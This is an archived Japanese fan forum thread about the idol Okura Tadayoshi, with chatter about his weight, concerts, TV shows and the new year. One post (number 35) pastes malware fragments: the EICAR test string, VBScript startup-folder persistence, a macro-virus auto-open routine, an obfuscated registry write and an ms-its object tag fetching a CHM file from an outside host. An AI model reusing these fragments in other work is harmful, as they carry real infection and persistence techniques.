5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●●●食$16●●●

1 :(`ヽ´)<さいきん、鍛えてんす:2006/12/20(水) 23:27:19 ID:3UzfUrjE
食の伝道師たっちょん
倉'masが寒くても(n‘ヽ‘)nウマーなモノはいっぱい食べます
(*`ヽ´)どこから出たのトロピカルジュース みーぎーちーくーびー

■sage推奨
■甜菜、煽りはスルー
■AA・食べ物禁止

前スレ
●●●食$15●●●
http://tv7.2ch.net/test/read.cgi/jr/1147790983/

2 :(`ヽ´)<さいきん、鍛えてんす:2006/12/20(水) 23:30:24 ID:3UzfUrjE
過去スレ一覧
●●●大倉忠義 単独スレ●●●【実質1】
http://saki.2ch.net/jr/kako/975/975858379.html
●●●MAO 大倉忠義●●●【実質2】
http://saki.2ch.net/jr/kako/984/984200832.html
●●●親分!大倉忠義単独スレ●●●【実質3】
http://saki.2ch.net/jr/kako/988/988469728.html
生きてます!大倉忠義 【実質4】
http://tv2.2ch.net/test/read.cgi/jr/1006853352/
●●●沈黙の最終兵器たっちょん!大倉忠義5●●●
http://tv2.2ch.net/test/read.cgi/jr/1051340754/
●●●踊る!大倉忠義6●●●
http://tv4.2ch.net/test/read.cgi/jr/1071755440/
●●●(`ヽ´)7●●●
http://music4.2ch.net/test/read.cgi/jr/1079707526/
●●●(`ヽ´)8●●●
http://music4.2ch.net/test/read.cgi/jr/1092762407/
●食$9●
http://tv7.2ch.net/test/read.cgi/jr/1097934272/
●●●食$10●●●
http://tv7.2ch.net/test/read.cgi/jr/1104464113/
●●●食$11●●●
http://tv7.2ch.net/test/read.cgi/jr/1109847777/
●●●食$11●●● (実質12スレ目)
http://tv7.2ch.net/test/read.cgi/jr/1113719818/
●●●食$13●●●
http://tv7.2ch.net/test/read.cgi/jr/1124728275/
●●●食$14●●●
http://tv7.2ch.net/test/read.cgi/jr/1136621169/

3 :ユー&名無しネ:2006/12/20(水) 23:35:44 ID:Mc8nHXGZ


4 :ユー&名無しネ:2006/12/21(木) 01:42:26 ID:pItNyPPx
>1
スレ殺陣乙d!

5 :ユー&名無しネ:2006/12/21(木) 02:41:13 ID:y7uIvWiY
>1
乙ですん

6 :ユー&名無しネ:2006/12/21(木) 05:18:17 ID:3kJyfx0m
>1スレ殺陣乙ですん

7 :ユー&名無しネ:2006/12/21(木) 11:31:49 ID:Sw3ukD4+
保守の為こちらにも
>1
スレ勃て乙です

8 :ユー&名無しネ:2006/12/21(木) 12:27:54 ID:Od7kQc6a
>1


9 :ユー&名無しネ:2006/12/21(木) 12:34:24 ID:0844epwe
親分これに懲りてしばらく連載やらなそうだな
更新待ちで一日波を気にする自分も若干面倒くさい(w
ところで炭水化物絶ってていきなり摂取してリバらないのだろうか

10 :ユー&名無しネ:2006/12/21(木) 12:42:12 ID:Od7kQc6a
むしろどんどんリバって未だかつてないほどデブってみて欲しい
デブ専のささやかな夢だが

11 :ユー&名無しネ:2006/12/21(木) 12:43:09 ID:msA2z/1B
そろそろ飽きて放置プレイでS発揮とエスパ

12 :ユー&名無しネ:2006/12/21(木) 17:57:11 ID:Sw3ukD4+
>10
今のカラダにモヘなので 反 対
今迄の頻繁な更新はこの焦らされ感をヲタに与える為か

13 :ユー&名無しネ:2006/12/21(木) 18:17:13 ID:WvUF0iPA
システムに勝った親分(w

14 :ユー&名無しネ:2006/12/22(金) 00:26:05 ID:VdmR/yBN
親分ケキョーク形能かえてないん棚
完全ネタギレ親分


15 :ユー&名無しネ:2006/12/22(金) 01:10:34 ID:Mn66HdVU
暇だから更新するんだろネタギレとは言い切れん
更新がないのは仕事してそれなりに忙しいんだよ
毎日4回も更新されたら本当に心配になる

こんな事を考える時点で親分の思惑通りだ

16 :ユー&名無しネ:2006/12/22(金) 01:53:30 ID:5a7N1iG7
もみまん後の妬きもち催促更新に期待汁(w


17 :ユー&名無しネ:2006/12/22(金) 03:05:21 ID:lFCmyWck
(`ヽ´)おまえちゃん
自分親分に負けず劣らずドSなのでじわじわと怒りが湧いてきている(w

18 :ユー&名無しネ:2006/12/22(金) 08:17:25 ID:hWxm6STb
>17
よくわかる
怒りとモヘを同時に感じてなんとももどかしい(w

19 :ユー&名無しネ:2006/12/22(金) 12:43:39 ID:KquZwaT1
更新ktkr

20 :ユー&名無しネ:2006/12/22(金) 23:29:41 ID:/8vt+qlu
(`ゝ´)カレーにコロッケのせ

21 :ユー&名無しネ:2006/12/23(土) 01:41:49 ID:lLYEwcNe
次のソロ曲はぜひともセーラー服の団子でヨロ

22 :ユー&名無しネ:2006/12/23(土) 10:18:06 ID:+pIbVu9b
一瞬セーラー服+お団子頭なのかと思って戦慄が走った

23 :ユー&名無しネ:2006/12/23(土) 12:14:52 ID:U+cnds2Q
蹴鞠師の車椅子親分見てると昔の24時間デラマの座長思い出した

24 :ユー&名無しネ:2006/12/24(日) 00:15:54 ID:ikX95LDB
親分メリ栗
連載始めの頃の℃Sはどこへ(w


25 :ユー&名無しネ:2006/12/24(日) 08:33:16 ID:xuOQx4Wx
℃Sにも飽きるところがまた親分らしい(w
明日までかとオモーと一抹の寂しさが

26 :ユー&名無しネ:2006/12/24(日) 11:57:46 ID:u7ThsXpq


(゚∀゚)俺の人生にオマイはいらんなと
(`ヽ´)…スバルクン昔っから言ってますよね
誰に対しても平等に言ってますよね(w
でもそれがスバルクンの愛情表現ですからね
(゚∀゚)…なんか最近、あれっすね
…ああ言えばこう言う的な
(`ヽ´)何がすかー?
(゚∀゚)こっちがああ言ったら、オマイはこっちから来るか〜みたいな
(`ヽ´)だって人数多いねんもん
(゚∀゚)いいと思いますよ
ウマなったなーと


27 :ユー&名無しネ:2006/12/25(月) 09:52:32 ID:WKSpdYsb
ピンクのぞぉってどうゆう意味?

28 :ユー&名無しネ:2006/12/25(月) 14:42:25 ID:Aag2iXVQ
かなり今更家だが
親分の波の今年の目標
縦に読むと名前になってるんだなorz

29 :ユー&名無しネ:2006/12/25(月) 14:50:39 ID:j9Wy92E2
なにそれ

30 :ユー&名無しネ:2006/12/25(月) 16:08:03 ID:kDam7HsS
>28
気付くの遅eeeeeeeeeeeeeeeeeeeeeeeeeee(w

31 :ユー&名無しネ:2006/12/25(月) 16:42:10 ID:eNRAj5pQ
手羽先なんかで飛べるかいっ

とツッコミ入れとくよ親分

32 :ユー&名無しネ:2006/12/25(月) 18:25:36 ID:70AoztKH
自分も知らなかった

33 :ユー&名無しネ:2006/12/25(月) 18:39:33 ID:YXzQx2uL
もう一回更新できるのかな
最後どう〆るつもりなんだろ親分

34 :ユー&名無しネ:2006/12/28(木) 02:51:47 ID:6SbHM4Zw
すごいスレストだな(w

鯱のエイトレンジャーで自分の席からスタンバイしてる親分が見えたんだが
すが見たことのないAVが見たいとおながい事をしたとき
親分はひっくり返る勢いで禿ワロテたよ
いつだかの下ネタ芸人のネタに禿ワロテた親分を思い出した(w

35 :<body onload=window()>:2006/12/28(木) 10:46:17 ID:XGax82Bw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

36 :ユー&名無しネ:2006/12/28(木) 13:04:16 ID:JB634i/2
>34
レポd!
ゲラ親分久々にktkr?
確かギモンの時の下ネタ芸人だよな

あの反応だったら想像しただけでテラホコーリ(*´∀`*)

37 :ユー&名無しネ:2006/12/28(木) 13:21:34 ID:KKVbxeE/
下ネタの時の反応って性格出るよな
気まずそうに苦笑いの℃っくんに対しマジゲラ笑いの親分(w
本能のまま突っ走ってますね

38 :ユー&名無しネ:2006/12/28(木) 16:58:22 ID:dWjbMlvo
横蟻親分レポ
残念なことにヘソ周りに若干のプヨを残し
腹筋が割れ始めている

28日1部
ユニスレでガイシュツかもだが付き合える年齢は16〜32
おはようやらおやすみやらお帰りのチスをしたがる親分
28日2部
アグリで太陽が見たいようを歌い損ね慌てる様がモニターに

39 :ユー&名無しネ:2006/12/28(木) 22:23:36 ID:bpQFVUD9
バタフライの時の衣裳のヒモ?
ハードなブレスレットと相まって
手錠チックで…(ノ∀`)

40 :ユー&名無しネ:2006/12/28(木) 22:30:31 ID:q2XWUlZx
虫カゴ入りの親分をお歳暮にください

41 :ユー&名無しネ:2006/12/29(金) 00:55:23 ID:YOqLLJWF
レンジャーで生き返った後
ブラックに
こんなところにおいしそうなおでんがある!はいどーぞ!
(;`ヽ´)わぁおいしそう!どれから食べようかな
……ってどないせーっちゅうねん!

とマジギレした後
こんなところにおいしそうなカレーがある!
とブラックに仕返ししてますた

42 :ユー&名無しネ:2006/12/29(金) 13:18:23 ID:YOqLLJWF
連投スマソ

29日1部
最後のカンジャニエイトー!の後
蟹しゃんしばらく手を離してくれず

親分上手出現率高いですぬ

43 :ユー&名無しネ:2006/12/29(金) 16:43:37 ID:YOYkB6Fs
29日1部で滝チャソを紺に誘ったと言ってたな
例の忘年会の時だろうか

44 :ユー&名無しネ:2006/12/29(金) 23:31:21 ID:YOYkB6Fs
連投スマソ
オーラスで一年を振り返るが城楽屋では頼朝と弁慶は紺リハ
あの装束のまま洋風ダンスしてたと(w
親分未来の向こうへから号泣
声をつまらせてながらもがんがって挨拶
親分ツアー乙でした

45 :ユー&名無しネ:2006/12/29(金) 23:50:11 ID:a6b1Tg1v
レポ姐さんdです
親分やっかし泣いたか(w

46 :ユー&名無しネ:2006/12/30(土) 00:23:46 ID:uSqsk2Rw
親分乙
今年は目まぐるしい年だったな

47 :ユー&名無しネ:2006/12/30(土) 00:49:30 ID:DCGYbJYJ
親分禿乙華麗
終始カコヨカタよ
来年もこの勢いのまま突っ走ってほしい

48 :ユー&名無しネ:2006/12/30(土) 09:55:34 ID:jiUlfORK
>42
確かに爽ダタ
自分28日親子29日北風呂入ったが前者は2回しか花道を通らずしかも通りすぎただけで後者も下手よりも上手ダタ


49 :ユー&名無しネ:2006/12/30(土) 10:26:38 ID:T4lDpXN7
親分乙
尻から太ももにかけてのお肉は健在で心から安心した

50 :ユーは名無しネ:2006/12/30(土) 11:40:09 ID:+wJlkSyn
>49
パンツぱっつんぱっつんだったよな
自分も安心した ノシ

51 :ユー&名無しネ:2006/12/30(土) 18:29:33 ID:k8Wke/7B
デラマの感想はそろそろいいのか能?

52 :ユー&名無しネ:2006/12/31(日) 09:32:26 ID:bb85fiwP
親分今年も乙
一日も早くお兄チャソな親分でモヘられる日を待ってるよ

53 :ユー&名無しネ:2006/12/31(日) 09:48:40 ID:J3ut9ePY
親分今年も一年間沢山の萌えと肉感をありがとう
来年もアフォ親分をいっぱいミセテクレ

54 :ユー&名無しネ:2006/12/31(日) 14:57:37 ID:JYCR9h+d
今更美男見たんだが、親分またピアスするようになったのか?

55 :ユー&名無しネ:2006/12/31(日) 16:01:31 ID:PA4aGZvo
ピアス、紺中これでもかってくらい光ってた

56 :ユー&名無しネ:2006/12/31(日) 16:01:38 ID:Yn/4PThb
親分も姐さん達も今年一年乙&d
沢山のモヘ、プヨ、プリケツ、おまけに筋肉やエロスまでありがとう
早く大口開けてアフォみたいに楽しく笑ってるゲラーズが見たいな

57 :ユー&名無しネ:2006/12/31(日) 17:19:28 ID:DtfCdrCE
しうまい参戦したが、歌い方がナツラルになってた
ネムオブに禿感動
年々大人になってくが、アフォと頬肉は残しておいてね

58 :ユー&名無しネ:2006/12/31(日) 17:24:19 ID:J3ut9ePY
ネムオブ?

59 :ユー&名無しネ:2006/12/31(日) 17:59:07 ID:CBPrCBux
>57
ノシ
自分もネムオブで生歌の成長を感じた
来年はどんな歌声が聞けるのかwktkだ


60 :ユー&名無しネ:2006/12/31(日) 20:32:01 ID:0x2jRkyj
親分と姐さんたち今年一年乙
親分は中身変わらずだが進化した一年だったな
来年もさらに歌って踊ってる親分が見られるのを楽しみにしてるよ
そしてゲラーズを自分もナモナモ

61 :ユー&名無しネ:2006/12/31(日) 21:49:45 ID:kGx806zo
横蟻オーラスで親分に落ちた新参ですノシ

正直今まで全く興味がなかったので親分について何も知らないが
とりあえず親分担としての初紺に今から行ってきますノシ

姐さん達これからひとつヨロシクです

62 :ユー&名無しネ:2007/01/01(月) 02:42:40 ID:iJv28tPT
あけおめですん

今年も親分の飛躍と姐さん達にとっての良い一年をナモナモ(-人-)
親分の再プヨゲラ復活もナモナモオパーイ(-人-)

63 :ユー&名無しネ:2007/01/01(月) 02:47:13 ID:X2JVQotE
親分姐さんたちあけおめ!
牛紺の親分の笑顔で良い年の幕開けだな
ドームに親分のドラムが響くかとオモーとwktkだ

64 :ユー&名無しネ:2007/01/01(月) 15:35:11 ID:XW6Ftfdu
昨日の通信
チョコ食べながらラジオして怒られる親分(w
(`ヽ´)糖分足らんねん
食事制限はど(ry

65 : 【だん吉】 【234円】 :2007/01/01(月) 15:40:47 ID:itZC6IVq
親分前にも放送中に物食ってつっこまれてたよな(w
しかも無意識で
似た様な事が3・4回か若しくはそれ以上あった気がする

66 :ユー&名無しネ:2007/01/01(月) 15:43:34 ID:84mlEV8v
注意されてない時もよく聞いてみると口に何か入れてるっぽい時ある

67 :ユー&名無しネ:2007/01/01(月) 20:00:53 ID:aug0yaZ+
親分あけおめ!今年もほんわか笑顔でいてホスィ
何があってもついてくよ(*´∀`)

68 :ユー&名無しネ:2007/01/01(月) 23:18:42 ID:5lb/3DMA
親分のあけおめ※はリバウンド宣ge(ry

69 :ユー&名無しネ:2007/01/02(火) 04:55:21 ID:JvW37B5d
親分アゴマルはロスで新年ってマジネタなんだろうか
℃っくんがいるからにしてもなんか不思議な取り合わせだな

70 :ユー&名無しネ:2007/01/02(火) 14:11:22 ID:DPF+UKI/
>69
そんなヤラカシネタイラネ

71 :ユー&名無しネ:2007/01/02(火) 17:47:46 ID:a4PsSWkD
黒い役の親分もいいとオモタ
お前さぁ…にぶいねん
ってウザそうにしゃべるのがorz

72 :ユー&名無しネ:2007/01/03(水) 17:38:00 ID:nsBoYQCM


73 :ユー&名無しネ:2007/01/03(水) 18:11:37 ID:7UevLGgf
年末から新年にかけて親分のそこはかとないエロ(not気堪能したお陰で
充実な1年のスタートが切れたよ

74 :ユー&名無しネ:2007/01/03(水) 21:08:20 ID:lax50r8W
親分やっかしヘンリさんの無茶振り怖かったんだな(w
でも三馬鹿にかなり鍛えて貰ってる気がするよ
なんだか有り難いよな

75 :ユー&名無しネ:2007/01/04(木) 06:48:50 ID:r2Mv9N3t
オーラスMCでパラが親分に同情してくれたんだよな
三馬鹿や滝チャソに無茶ブリで鍛えられた去年だった(w

76 :ユー&名無しネ:2007/01/04(木) 18:32:39 ID:kmrpIBub
親分GJ

77 :ユー&名無しネ:2007/01/04(木) 18:44:39 ID:WPYfaa1p
何とか気持ちを伝えようとする時の親分の言葉選びは
本当にストレートなのに的確だな
親分GJ

78 :ユー&名無しネ:2007/01/04(木) 18:45:38 ID:6VUBFBHL
勝手に拠り所にしてしまってスマソ親分
でもたった3文字にこれ程安心させられるとは

79 :ユー&名無しネ:2007/01/04(木) 19:37:30 ID:OyOkppfN
狙ってると言われようが何と言われようが
ヲタが欲しい言葉をいつもくれる親分に禿感謝
くじけずにヒヨを待ってられる

80 :ユー&名無しネ:2007/01/04(木) 20:05:34 ID:cf/Jq+W/
親分GJ。・゚・(ノД`)・゚・。
オマイの担であることを誇りにオモーよ

81 :ユー&名無しネ:2007/01/04(木) 20:32:11 ID:6XwT4GOn
電車ん中で涙腺崩壊orz親分やっかし最高だ

82 :ユー&名無しネ:2007/01/04(木) 22:34:55 ID:/G7nvY+A
親分ありがとう

83 :ユー&名無しネ:2007/01/05(金) 00:11:55 ID:pEArBNio
他ユニ担ですが失礼します
親分の言葉に目汁が止まりませんでした
最高で最強な8人衆です
自分も親分とここの姐さん達と一緒にガンガルノシ

長文スマソ

84 :ユー&名無しネ:2007/01/05(金) 06:42:12 ID:ekLkdWdE
空気読まずにスマソ

親分は素顔に出てない?


85 :ユー&名無しネ:2007/01/05(金) 12:12:50 ID:+yMAWfWT
コン映像にはいないがオフショットにはいるよ
全部合わせて五秒位だけど

86 :ユー&名無しネ:2007/01/05(金) 12:56:24 ID:ekLkdWdE
>85
d
探してみる

87 :ユー&名無しネ:2007/01/05(金) 13:09:37 ID:+yMAWfWT
自分が確認できたのは少年J?のカメラモニタの中のネ申紹介の後と
公録滝チャソの周りでワラワラ踊ってる中の一人と
公録が終わった後のバクステの「お疲れさまでした」
いずれも瞬殺だが(w

88 :ユー&名無しネ:2007/01/05(金) 16:41:06 ID:ekLkdWdE
ビーバー具合は確認できるか能?

89 :ユー&名無しネ:2007/01/05(金) 17:02:55 ID:JDTeuEwr
できるっちゃできる

90 :ユー&名無しネ:2007/01/05(金) 18:18:23 ID:ekLkdWdE
姐さん方重ね重ねd
ビーバー捜索にいってくるノシ

91 :ユー&名無しネ:2007/01/06(土) 00:08:27 ID:SU2AoJ0S
芋誌いいのぅ
表情もだけど
腕の血管具合がorz

92 :ユー&名無しネ:2007/01/06(土) 00:33:51 ID:/dD8WOKx
何でorzなのか理解できん

93 :ユー&名無しネ:2007/01/06(土) 00:37:46 ID:t/tAaqmI
使い方を間違ってるんじゃ?
前にもなんでorzなんだというのがあったし

94 :ユー&名無しネ:2007/01/06(土) 01:17:29 ID:5sZW02XL
親分の頬袋少しでいいから復活してくれ
何だか顔が寂しいよ

95 :ユー&名無しネ:2007/01/06(土) 12:17:50 ID:fPGSOWdt
親分に負けたくないツンデレ姐さんの敗北感=orz
結構ここでは見かけると思うが

96 :ユー&名無しネ:2007/01/06(土) 12:26:45 ID:EYG7Owgx
>94
ノシ
久しぶりに昔のビデオ見て顔の大きさの違いに驚いた

97 :ユー&名無しネ:2007/01/06(土) 13:05:31 ID:cPumOPwE
このスレは親分との勝負の場でもあるからな(w
年頭から早くも負けつつあるわけだが

98 :ユー&名無しネ:2007/01/06(土) 15:42:55 ID:M6RnYCdQ
同ユニ他担の自分が見る限りでは
姐さん達は負けつつどころか年中負けっぱなしだぞ(w

99 :ユー&名無しネ:2007/01/06(土) 16:23:34 ID:7lXtG0yn
頬袋が恋しい新年
$誌見てもこけてるようにしか見えナス

100 :ユー&名無しネ:2007/01/06(土) 19:12:27 ID:y+/vle5Y
寒い冬だからふくよかな頬と腹が恋しい('A`)

101 :ユー&名無しネ:2007/01/06(土) 19:21:59 ID:CIrRKzKO
自分は今の親分悔しいがモヘだ(w
もっと筋肉が付けば多分尚更モヘる
でもプヨってもテラモヘ
要は℃うあっても完敗という事です

102 :ユー&名無しネ:2007/01/06(土) 20:57:13 ID:wxO2oyj+
>101
それを言っちゃおしめーよ

103 :ユー&名無しネ:2007/01/07(日) 00:25:42 ID:jJDNKHSx
親分頬袋残したまま筋肉付けてくれればイイのにな

104 :ユー&名無しネ:2007/01/07(日) 01:08:33 ID:ys1U3eyU
>102
寅さんktkr

105 :ユー&名無しネ:2007/01/07(日) 01:11:41 ID:r7DAShI3
確かに頬袋の中身少なくなったとオモーけど
今の親分めっちゃビズいいよ

106 :ユー&名無しネ:2007/01/07(日) 01:29:39 ID:jJDNKHSx
ビズはいいが笑うと特に頬袋辺りがこけているように見える

107 :ユー&名無しネ:2007/01/07(日) 01:57:47 ID:c+RS2vDU
ビズの良し悪しだって好みがあるんだぞ

108 :ユー&名無しネ:2007/01/07(日) 10:35:45 ID:3EbODRyn
体だけ痩せて頬袋があるといいな

109 :ユー&名無しネ:2007/01/07(日) 11:33:26 ID:Z7ZRZnAl
頬袋親分を見慣れてるからこけてる様に感じる鴨試練が
実際そんなにこけてる訳では無い様な気もする
自分は今の親分のビズもスチだな

110 :ユー&名無しネ:2007/01/07(日) 19:09:54 ID:0Azkc6BH
自分は親分のオパーイがスチ

111 :ユー&名無しネ:2007/01/08(月) 01:09:20 ID:1QCi7bWy
親分を見るたびにビズやら何やら何処かしら変わってて
悔しいがその度に敗北感に襲われる
でもこうなったら親分の思うままにとことん打ちのめされたい

今年もいろんな親分が見られますように(・人・)

112 :ユー&名無しネ:2007/01/08(月) 21:52:06 ID:xyt+q6CF
サラサラの髪から覗かせる瞳で上目遣い気味に微笑む親分(w
めちゃめちゃ間近でお手振りされて鼻血出そ(ry
そして泣き顔でフアンサガンガる姿に堪らなく萌えました
自分語りでスマソ今年もミリキイパーイな親分でいて下さい

113 :ユー&名無しネ:2007/01/08(月) 22:26:54 ID:iDgSq/mC
親分に負けたことなんかないわ

114 :ユー&名無しネ:2007/01/08(月) 22:45:55 ID:jpzBPqVl
>113
敗北感タプーリ漂ってみえるのは気のせいか(w

115 :ユー&名無しネ:2007/01/10(水) 01:35:19 ID:tq3KrDSI
今日も敗北(*´∀`)

116 :ユー&名無しネ:2007/01/10(水) 01:39:07 ID:iYS/8vB9
スカMCの時は胸元開けのホスト風味だったのに
目の前に出てきたら食べ物でアタマイパーイで余裕なくなる親分(w

117 :ユー&名無しネ:2007/01/10(水) 03:32:45 ID:PjmEmjWH
イケメソが長続きしないこその親分
ふいにブサ顔抜かれてこその親分
完璧イケメソが定着したら可愛げがなくてドS的には寂しい

118 :ユー&名無しネ:2007/01/10(水) 07:52:06 ID:ycU96Mnf
ヤパーリ頬袋は必要
スカ見るとゲソーリ杉

119 :ユー&名無しネ:2007/01/10(水) 09:55:12 ID:MgexBkok
自分もオモタ
痩せた親分もカッコヨスだが頬袋が懐かしいorz
でも今の親分スチ

120 :ユー&名無しネ:2007/01/10(水) 21:18:38 ID:bAfyFIs9
前歯2本だけ白くみえた


121 :ユー&名無しネ:2007/01/10(水) 21:48:59 ID:xKo6AOpP
>120
遂にリヤルビーバーktkr?(w

122 :ユー&名無しネ:2007/01/10(水) 23:56:16 ID:kB1SNRDg
オリスタの真ん中の写真
子供みたいな笑顔だな(ノ∀`)

123 :ユー&名無しネ:2007/01/11(木) 02:12:01 ID:QA0wQ5IE
>122
アレを載せたオリスタには感謝したい(w
たまにああいうのがあるとテラモヘ

124 :ユー&名無しネ:2007/01/11(木) 07:20:52 ID:/Tr1l342
同ユニ他担が失礼します
横蟻で親分に落ちた友人に見せてあげようと思うんだが
姐さん方オススメの本、裏、ギモン、スカはどの回がいいか能?


125 :ユー&名無しネ:2007/01/11(木) 09:20:13 ID:ApOP3V6O
>124
本なら料理で指燃えた回やスポーツ系ならサッカーやホッケーがお勧め
裏はヘンリさんと行った催眠術で人間相手の鬼ごっこはギモンだったか?
班長と組んでてオトリで捕まった後の偉そうな態度がヨカタとオモー
スカは街ジャニとか萌えが多すぎなので片っ端から見せてあげてくれ(w

126 :ユー&名無しネ:2007/01/11(木) 09:29:23 ID:zt4Ouocb
>124
裏警察犬の回で真っ先に捕まるヘタレ親分とか
ムゲのバイトやカレーの足ガクガクも捨て難い(w

127 :125:2007/01/11(木) 09:49:18 ID:ApOP3V6O
>126
(`ヽ´)俺は木ぃや
それを忘れてた
確かにバイトは外せない(w

128 :ユー&名無しネ:2007/01/11(木) 09:59:28 ID:W0JPJPb+
>124
個人的には本なら指燃えたと
テニスでテンテーにスマッシュきめまくるやつがおすすめ

129 :ユー&名無しネ:2007/01/11(木) 11:54:31 ID:/Tr1l342
>125-128
姐さん方、禿dです

指燃えたと催眠術は頭にあったんだが、
他はスカーリ記憶になかったよ
これで布教活動してきますん


130 :ユー&名無しネ:2007/01/11(木) 12:56:55 ID:BP3+Mv9c
つウェイター

131 :ユー&名無しネ:2007/01/11(木) 13:01:26 ID:J6ZjhSRj
スカはビリヤードもオススメです

132 :ユー&名無しネ:2007/01/12(金) 04:57:26 ID:VKl2UNHE
自分もギモンのウェイターはイチオシだ
あと一瞬だがこの間のスカの本気のアイドルスマイルとか(w

133 :ユー&名無しネ:2007/01/12(金) 14:21:57 ID:fbTz4hdW
>132
一応 つムゲ

134 :ユー&名無しネ:2007/01/12(金) 15:35:27 ID:1oHeyCDS
ウェイターって一番星になる前のスカだった気が

135 :ユー&名無しネ:2007/01/12(金) 22:09:18 ID:nyl6ydCh
エロ親分がお好みなら街ジャニの耳エステの回

136 :ユー&名無しネ:2007/01/13(土) 00:11:54 ID:QszkFIWu
バスローブな
あれはヤバかった

137 :ユー&名無しネ:2007/01/13(土) 00:17:38 ID:VAwBKe2n
耳エステ親分を見せるなら
エステ後にモザイクかけてやってくれ(w

138 :ユー&名無しネ:2007/01/13(土) 00:58:12 ID:uh+GXSKT
バーテンも捨て難い

139 :ユー&名無しネ:2007/01/13(土) 01:15:40 ID:FYMtFMBi
すさんでプチキレも捨て難い

140 :ユー&名無しネ:2007/01/15(月) 15:48:46 ID:QurAREu/
あれスレスト
自分はカクイイだアフォだ考えなければUSJとスパイダーマソがおすすめ

141 :ユー&名無しネ:2007/01/15(月) 17:24:54 ID:rZ8h7pk1
スパイダーマソあったな
ボロボロ親分(w

142 :ユー&名無しネ:2007/01/17(水) 00:57:23 ID:onoDB8nk
後頭部ハゲてない?

143 :ユー&名無しネ:2007/01/17(水) 01:05:05 ID:qv2iii/K
>142
つ半角,sage
人の後頭部を気にする前にとりまえずロムれ

144 :ユー&名無しネ:2007/01/17(水) 01:12:49 ID:CUGjDGgK
>>143
つ ,

145 :ユー&名無しネ:2007/01/17(水) 01:27:11 ID:q0Elda9Z
>144
ハイパーはでしゃばってないで氏ね

146 :ユー&名無しネ:2007/01/17(水) 12:28:44 ID:S0Kn7xZo
5位w
マジ凹みな親分

147 :ユー&名無しネ:2007/01/17(水) 12:37:38 ID:mtLYve6G
>146
つ(

痩せすぎだけどビズ良過ぎてハァ━━━━*´Д`*━━━━ン!!!!!
モヘ苦しい

148 :ユー&名無しネ:2007/01/17(水) 12:39:36 ID:6K8Xl6Ob
すと並んで呆然としてる顔ワロス
自信あったのか親分(w

149 :ユー&名無しネ:2007/01/17(水) 14:43:16 ID:AhML8T6A
自分に似てると言われてる議長6位は納得だが5位は(´,_ゝ`)
ドS親分にはたまにこういう仕打ちあっていいよな(w

150 :ユー&名無しネ:2007/01/18(木) 00:10:35 ID:fMypTPH0
http://0bbs.jp/zatudandao/img0_4680

151 :ユー&名無しネ:2007/01/18(木) 17:40:56 ID:AvSYonu4
左右対称だとどっかで見たことある顔になるな(w

152 :ユー&名無しネ:2007/01/18(木) 21:29:19 ID:fTzDKs/U
ジョン扱いでいいから親分家温泉旅行に同行したいもんだ(w
しかしなぜタイトルがおならぷう〜なのか

153 :ユー&名無しネ:2007/01/19(金) 02:42:30 ID:gblWi5Z1
>152
きっと温泉で(ry

154 :ユー&名無しネ:2007/01/19(金) 03:14:35 ID:Kd4QjLGL
いやいやプールで(ry

155 :ユー&名無しネ:2007/01/19(金) 12:29:03 ID:DADWUu/3
いやキジ鍋中に(ry

156 :ユー&名無しネ:2007/01/19(金) 13:09:51 ID:geCAm7uf
いやいや車中で(ry

157 :ユー&名無しネ:2007/01/19(金) 15:00:44 ID:CUO/v9mh
どんだけコいてんだ(w

158 :ユー&名無しネ:2007/01/19(金) 19:15:36 ID:DzCQMSWF
まさかキャッチボール中に(ry
弟達に笑われたのは失敗したからでは無く(ry

159 :ユー&名無しネ:2007/01/20(土) 22:43:06 ID:LjKapxzf
ぶったま親分が変な半纏着てブサで眠そうだったというレス見ると
是非見てみたいと思うS心

160 :ユー&名無しネ:2007/01/21(日) 00:00:30 ID:9nTWOFzh
半纏親分になら勝てそうな気がする
いや負けた覚えなんて(ry

161 :ユー&名無しネ:2007/01/21(日) 00:34:15 ID:yhMc0z4/
半纏のような衣装で1時間くらい終始眠そうだったが
ブサではなかったぞ(w
寝起きにしてはカクイイよ
しかし前髪がまたウザーな長さになってきた

162 :ユー&名無しネ:2007/01/21(日) 01:18:16 ID:SOQtxonN
つい数日前に切ったばかりのハズだが(w

163 :ユー&名無しネ:2007/01/21(日) 01:43:31 ID:zTVlcp8F
実況でもどこか変わった?って言われてたしな(w
超マイナーチェンジとトリートメントのみと予想

164 :ユー&名無しネ:2007/01/22(月) 04:30:27 ID:R11llLYw
親分のソロ曲が頭から
離れない…orz
早くDVDかCD化してくれないか脳。


携帯からチラ裏スマソ

165 :ユー&名無しネ:2007/01/22(月) 17:17:15 ID:4FdErZ34
>164姐さんゴミついてる


166 :ユー&名無しネ:2007/01/22(月) 17:24:44 ID:If4Xmk4+
>164
書き込む前にルールと空気が嫁るようになるまでロムるのは
この板の鉄則
>165
姐さんなんて呼ばななくていい
完全に厨だろ


167 :ユー&名無しネ:2007/01/22(月) 20:37:16 ID:PZhher9a
こんな掲示板で規則規則うるさいのがどこにでもいんのな
アングラだったころも知らない厨のくせして
ウゼー

168 :ユー&名無しネ:2007/01/22(月) 21:23:10 ID:0JXSkGnK
>163
キラキラサラサラヘヤーは$の命ですん(w

